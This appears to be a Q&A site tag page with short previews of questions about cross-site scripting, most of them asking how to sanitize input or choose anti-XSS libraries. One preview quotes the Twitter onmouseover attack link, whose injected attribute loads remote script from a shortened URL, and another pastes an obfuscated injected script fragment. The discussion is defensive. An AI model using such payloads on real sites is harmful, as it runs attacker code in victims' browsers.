xss

Preventing XSS in Node.js / server side javascript

Hi all, any idea how one would go about preventing XSS attacks on a node.js app? Any libs out there that handle removing javascript in hrefs, onclick attributes, etc. from POSTed data? I don't want to have to write a regex for all that :) Any suggestions? ...

JQuery append without HTML?

Hello, I'm having an XSS vulnerability using jQuery's .append() function. What I'm doing is appending raw chat messages coming from users, and I don't want to strip HTML tags server-side or client-side; I just want to display them. Yet jQuery's .append() method renders the HTML markup. Any way to do something like appendText()? I tried .text() but it do...

Regex as first line of defense against XSS

I had a regex as the first line of defense against XSS. public static function standard_text($str) { // pL matches letters // pN matches numbers // pZ matches whitespace // pPc matches underscores // pPd matches dashes // pPo matches normal punctuation return (bool) preg_match('/^[\pL\pN\pZ\p{Pc}\p{Pd}\p{Po}]+...

sanitizing untrusted url strings that will be passed to location.replace

I'm getting a string from the current window's fragment identifier (location.hash). I want to use that string as the argument to location.replace(str). Under normal circumstances, the string will come from code I control, so I'm not worried about validating that the string is a URL. If the string isn't a URL, the call to replace will ...

Today's XSS onmouseover exploit on twitter.com

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ Is this technically an XSS attack or something else? Here is how the Twitter home page l...

Codeigniter - Disable XSS filtering on a post basis

Hi, I'm trying to set up a CMS on the back of a site but whenever post data has a I've got $config['global_xss_filtering'] = TRUE; in config. My question is: is there a way of disabling XSS filtering for one item? e.g. $this->input->post('content', true); turns it on, but how to turn it off? Thanks everyone. PVS ...

using encodeURI to display an entire page

Hi, I am making a Chrome extension where I save a page to the database as a string and then open it later as a data URI scheme like: d = 'data:text/html;charset=utf-8'+encodeURI('HTML TEXT') location.reload(d); The problem with this is that the page, say its name is http://X/, in which I executed the above command loses the javascript ...

How to accept programming code input for displaying purposes?

What is the safest way to accept user inputted programming code in PHP, store it in database and display it back with the HTML pre tag? I currently convert the input to HTML entities, but I somehow think it wouldn't be that easy... Any suggestions? ...

XSS Best practices for an ASP.NET application

I have downloaded the latest version of the XSS Library, which seems to be compiled with .NET 3.5, but our ASP.NET application runs on .NET v2.0. Is it possible to run this library with an ASP.NET v2.0 application? I don't think that will be possible without compiling the ASP.NET app against v3.5? Do you think V1.5 of the XSS library ...

How to handle Script Attack in application

We are facing issues of javascript getting embedded into the message body; following is the code snippet of the javascript: } {*\htmltag241 var DanaShimData="var DSJsFuncs = ,null,,,,[{nm:\"Refresh\",lcnm:\"refresh\",flg:0xb},{nm:\ \"Install\",flg:0xf},{nm:\"writeln\",flg:0x3f},{nm:\ "GotoURL\ \",flg:0xe},{nm:\"AddRoot\",lcnm:\...

Could browser javascript harm my backend server?

Hi, I'm coding an application where I want to let the user learn javascript in this way: The user writes javascript code in the browser like in an IDE. The user saves it and the code will be saved as a string in my backend No-SQL database (MongoDB/CouchDB). The user opens the application some days later and I pass that string to the we...

Cross-Site Authorization

The Scenario: 1. We have a site running .Net 4.0 which manages the users, logins, data etc...; 2. We have another site running just client-side script (javascript); We need: A. Log in from the client-side site on the .Net site; B. For the time of the .Net session (15min) access data in the Database, implementing some authorization, or save some info on cl...

Which Anti-XSS library should I use? Microsoft XSS 4.0, Web Protection Library on Codeplex, or other?

Seems like Microsoft updated the Anti XSS library today: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=f4cd231b-7e06-445b-bec7-343e5884e651 In addition there is a new release of the Web Protection Library http://wpl.codeplex.com/ Are these two downloads the same thing? What XSS library should I be using? Are there ot...

How do I allow images in the HTMLPurifier?

I want to allow images within my HTML Purifier filter. Unfortunately they are still being filtered. What is wrong with this code? $config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); $config->set('URI.DisableExternalResources', false); $config->set('URI.DisableResources', false); $config->set('HTML.Allowed', 'u,p,b,i,span[style],p,st...

Possible to have compiler support (type safety) for avoiding double encoding for anti-XSS during Web development?

Is it possible to have compiler support to enforce the cleanup of data (XSS encoding)? This question got me thinking about double encoding and the other times when encoding is needed. Seems like it would work great for Linq, but possibly I may need this feature in other scenarios as well. http://stackoverflow.com/questions/3774776/mic...

Why is so much HTML input sanitization necessary?

I have implemented a search engine in C for my HTML website. My entire web is programmed in C. I understand that HTML input sanitization is necessary because an attacker can input these 2 HTML snippets into my search page to trick my search page into downloading and displaying foreign images/scripts (XSS): <img src="path-to-attack-site...

Cakephp Security

I am new to security of web apps. I am developing an application in CakePHP and one of my friends told me about the Cross-site request forgery (CSRF) and cross-site scripting (XSS) attacks etc., not sure how many more there are. I need some help in understanding how to make CakePHP defend my web app against these. We are low budget and w...

How vulnerable to XSS attacks is Flash?

The reason why I ask is that I'm telling a vendor of ours they have to use the MS AntiXSS library with the ASP.NET UI components they make, but they also work with Flex to build Flash-based UIs, and I was wondering if there's an equivalent for Flash (assuming it's vulnerable). ...

What are the risks associated with Hosting 3rd party Javascripts?

I'm a new developer at my company and I do mostly front-end web development. Our team is frequently asked by our Sales and Marketing people to incorporate 3rd party javascripts on our site. "Here's a 'little code snippet'. Our vendor asked if you could put this in our home page" This makes me very nervous. I know these scripts can ...

Use XSS on a site, Dynamically

Hi, I'm trying to find out if it's possible to check sites for being vulnerable to XSS dynamically, by using PHP. Are there solutions for this? Or is it just impossible and should it be done by hand? Kevin ...